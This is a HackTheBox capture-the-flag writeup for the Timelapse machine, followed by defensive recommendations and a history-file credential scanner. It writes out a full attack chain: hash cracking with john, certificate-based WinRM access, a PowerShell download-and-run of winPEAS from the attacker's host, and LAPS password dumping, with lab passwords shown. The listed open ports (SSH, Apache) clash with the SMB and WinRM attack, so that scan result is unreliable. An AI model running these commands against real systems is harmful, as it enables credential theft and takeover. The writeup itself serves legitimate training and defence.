---
title: "Writeup - Timelapse (HTB)"
date: 2022-04-03
slug: "writeup-timelapse-htb"
type: "writeup-ctf"
---

This is a writeup for the [Timelapse](https://app.hackthebox.com/machines/Timelapse) machine from the HackTheBox site.

## Enumeration

First, let's start with a scan of our target with the following command:

```bash
nmap -sV -T4 -Pn 10.129.188.205
```

Many TCP ports are discovered:

![](img/image-1.webp)

- 22/tcp : SSH port (OpenSSH 8.2)
- 80/tcp : HTTP web server (Apache 2.4.41)

## Exploit

First, I list the SMB shares with the `guest` account:

```bash
enum4linux -a -u "guest" -p "" 10.129.188.205
```

![](img/image-2.webp)

The `Shares` folder is readable, so let's see what we can find in it:

![](img/image-3.webp)

We find two folders. In one of them is the file `winrm_backup.zip`; I download it and try to unzip it, but it is protected by a password. Let's try to crack this password with john. First I extract the hash with the following command:

```bash
zip2john winrm_backup.zip > hash
```

Then I launch a dictionary attack with john using the rockyou wordlist:

![](img/image-4.webp)

John quickly finds the password `supremelagacy`, so I can now unpack the archive. In it I find a file with the `.pfx` extension. These files are used by Windows to store certificates in `PKCS#12` format, and from such a file we can retrieve both the certificate and the private key (cf. [ibm.com](https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file)). To do so, I use the following commands:

```bash
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out prv.key
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt
```

Problem: the PFX file is also protected by a password. I test the password found previously, but without success. Once again we have to use john to brute force the password. First I get the hash with the following command:

```bash
pfx2john legacyy_dev_auth.pfx > hashbis
```

Then I launch the dictionary attack with john:

![](img/image-5.webp)

John finds the password `thuglegacy`, so I can now extract the private key and the certificate. I then try to connect to the machine using these two files for authentication. For that I use `evil-winrm` with the following command:

```bash
evil-winrm -i 10.129.188.205 -S -c cert.crt -k prv.key -p -u
```

![](img/image-6.webp)

I now have a shell as the `legacyy` user and I can get the first flag.

```powershell
*Evil-WinRM* PS C:\Users\legacyy\Desktop> more user.txt
6a29afecacdabd66d286759e1f1379ff
```

## Privilege escalation

For the privilege escalation I start by uploading winPEAS, then I execute it:

```bash
powershell "Invoke-WebRequest -UseBasicParsing 10.10.14.173/winPEASx64.exe -OutFile winPEASx64.exe"
./winPEASx64.exe
```

In the program's output, I find that a file containing a command history exists on the machine:

![](img/image-7.webp)

I retrieve it on my machine with the following command:

```bash
download C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
```

```powershell
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
```

Looking at the contents of the file, I find a user and his password! Another thing winPEAS tells me is that the user `svc_deploy` has the right to read the LAPS password attribute:

> The "Local Administrator Password Solution" (LAPS) provides management of local account passwords of domain joined computers. Passwords are stored in Active Directory (AD) and protected by ACL, so only eligible users can read it or request its reset.

So I try to read it with the [LAPSDumper](https://github.com/n00py/LAPSDumper/blob/main/laps.py) script with the following command:

```bash
┌──(d3vyce㉿kali)-[~/Documents]
└─$ python3 Windows/laps.py -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -d timelapse.htb
DC01$:J3V}8QBsB4Q6+jgveai$7}}M
```

The script finds the local administrator password of the machine! I can now connect with the following command:

```bash
evil-winrm -i 10.129.188.205 -S -u Administrator -p 'J3V}8QBsB4Q6+jgveai$7}}M'
```

![](img/image-8.webp)

I now have a shell as Administrator and I can retrieve the last flag.

```powershell
*Evil-WinRM* PS C:\Users\TRX\Desktop> cat root.txt
09cec1f63345aa18fcf4bd05b9be6714
```

## Recommendations

To patch this host I think the following actions would be necessary:

- Do not allow SMB shares containing important files to be accessed by unauthenticated users
- Do not use weak passwords to protect certificates
- Do not leave files containing clear-text passwords
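As an added example for the last recommendation (this is not code from the original writeup), here is a small scanner that a defender can run over every user's `ConsoleHost_history.txt` to flag the kind of cleartext credential found on this box, reporting each hit with the secret redacted. The history it runs on is constructed and the passwords in it are placeholders.

```python
"""Scan PSReadLine history (ConsoleHost_history.txt) for cleartext credentials.

Added defender-side example, not code from the original writeup. It runs
over a constructed history modelled on the one found on the box: a literal
password passed to ConvertTo-SecureString -AsPlainText is the giveaway.
"""
import re
from typing import List, Tuple

# Each pattern names the secret via the 'secret' group so it can be redacted.
PATTERNS = [
    ("ConvertTo-SecureString with literal -AsPlainText password",
     re.compile(r"ConvertTo-SecureString\b(?=.*-AsPlainText).*?"
                r"(?P<secret>'[^']*'|\"[^\"]*\")", re.I)),
    ("net use with literal password",
     re.compile(r"net\s+use\b.*\s(?P<secret>[^\s*]\S*)\s+/user:", re.I)),
]

# Constructed sample; the passwords are placeholders, not values from the box.
SAMPLE_HISTORY = r"""whoami
ipconfig /all
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'Pa55w0rd-placeholder' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
net use Z: \\dc01\c$ Sh4re-placeholder /user:timelapse\svc_deploy
exit
"""


def scan_history(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_no, finding, redacted_line) for every line holding a secret.

    The redacted line is safe to forward to a SIEM or a ticket: the matched
    secret is replaced, everything else (user, host, command) is kept.
    """
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for name, rx in PATTERNS:
            m = rx.search(line)
            if m:
                start, end = m.span("secret")
                findings.append((line_no, name, line[:start] + "<redacted>" + line[end:]))
                break  # one finding per line is enough
    return findings


if __name__ == "__main__":
    for line_no, name, redacted in scan_history(SAMPLE_HISTORY):
        print(f"line {line_no}: {name}\n    {redacted}")
```

A line that passes a variable rather than a literal (for example `ConvertTo-SecureString $env:PW -AsPlainText`) is deliberately not flagged, since the file itself then holds no secret.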